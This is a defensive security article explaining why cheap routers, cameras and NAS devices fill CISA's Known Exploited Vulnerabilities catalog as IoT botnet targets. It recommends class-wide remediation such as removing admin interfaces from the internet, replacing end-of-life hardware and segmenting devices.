The catalog is full of cheap routers and cameras for one reason: they're botnet feedstock

Read enough of the Known Exploited Vulnerabilities catalog and a pattern jumps out: page after page of command-injection and authentication-bypass bugs in cheap network gear. D-Link routers, NAS boxes, and access points. TP-Link, ASUS, DrayTek, and Netgear routers. Dahua, Reolink, and Edimax IP cameras. Dasan GPON routers, Realtek and other embedded SDKs that ship inside dozens of brands. MikroTik and Cisco small-business routers. They span a decade of CVEs and a dozen vendors, and they are not separate stories. They are one story, told over and over: internet-exposed consumer and small-business devices, with weak firmware and short support lives, get conscripted into IoT botnets, and the remediation barely changes from one to the next.

Treating these as individual emergencies misses the point. Treating them as a class is how you actually defend against them.

Why this class exists

Consumer and SOHO network devices share a set of properties that make command-injection bugs both common and durable:

• They’re built to a price. Security engineering, code review, and long-term firmware maintenance cost money that a $40 router’s margin doesn’t support. Web admin interfaces that pass user input into shell commands are endemic, which is why “OS command injection” is the single most common vuln type in this corner of the catalog.
• They’re exposed on purpose. People forward ports or enable remote administration so they can reach the device from outside, putting the vulnerable web interface directly on the internet where mass scanners find it in minutes.
• They go end-of-life fast and silently. A router model is sold for a couple of years and supported for a few more, then abandoned, but the hardware keeps running in homes and small offices for a decade. No more firmware, no more fixes, no auto-update.
• Nobody patches them. There’s no IT team, no inventory, no maintenance window. The device works, so it’s forgotten until it’s part of a botnet.

The result is a vast, stable population of vulnerable internet-connected devices, which is exactly what botnet operators want. Since Mirai weaponized cameras and routers at scale in 2016, this gear has been the feedstock for DDoS botnets, proxy and relay networks (ORBs) that launder criminal and nation-state traffic, and footholds into the small networks the devices sit on. The KEV catalog keeps adding these CVEs because they keep getting exploited, by the same opportunistic, mass-scanning playbook each time.

The remediation is the same almost every time

Because the class is uniform, so is the defense. Whatever the specific vendor and CVE, the actions are:

• Take the device’s management interface off the internet. Disable remote administration, UPnP, and port forwarding to the admin UI. The overwhelming majority of this exploitation requires reaching a web interface that should never have been internet-facing. This one control defuses most of the catalog’s router and camera entries at once.
• Replace end-of-life hardware. If the vendor no longer ships firmware for the device, there is no patch coming, ever. EOL edge gear is a liability with no remediation path but replacement. Budget for it as a lifecycle cost.
• Update firmware on supported devices, and turn on auto-update if offered. For gear that’s still maintained, applying firmware closes the known bugs. Most owners never check, so make it deliberate.
• Change default credentials and disable unused services. Many of these bugs are worse, or only reachable, with default or weak credentials and unnecessary services enabled. Hardening the basics shrinks the surface.
• Segment IoT and edge devices. A compromised camera or router shouldn’t have a flat path to anything that matters. Put IoT on its own VLAN/SSID, away from the systems and data you care about.

For the people who manage many of these

The hardest-hit are home users and small businesses without IT, and the MSPs who serve them. If that’s you:

• Inventory the edge. You can’t replace or patch what you don’t know is there. Catalog the routers, cameras, NAS boxes, and access points across your sites and clients.
• Standardize and lifecycle. A small set of supported, current device models is far easier to patch and retire on schedule than a zoo of whatever was cheapest. Track end-of-life dates and replace ahead of them.
• Make “no admin interface on the WAN” a baseline. Audit for exposed device management and remote-admin features; it’s the highest-value, lowest-cost control across the whole class.

The reframe is to stop reading these as a stream of unrelated CVEs and start reading them as a category with a category-level answer. A new D-Link or TP-Link or camera command-injection bug isn’t news; it’s the same vulnerability class reappearing, and your posture, get it off the internet, replace it if it’s dead, segment the rest, defends against the next one as well as this one. The catalog will keep adding cheap-device bugs forever. You don’t have to chase them one by one if the gear isn’t reachable and isn’t past its grave. We track this whole class as one ongoing pattern, because that’s exactly what it is.

Sources

• CISA Known Exploited Vulnerabilities Catalog
• CISA: Securing network infrastructure devices
• CISA / FBI guidance on SOHO router security and end-of-life devices
• Mirai botnet background (US-CERT alert TA16-288A)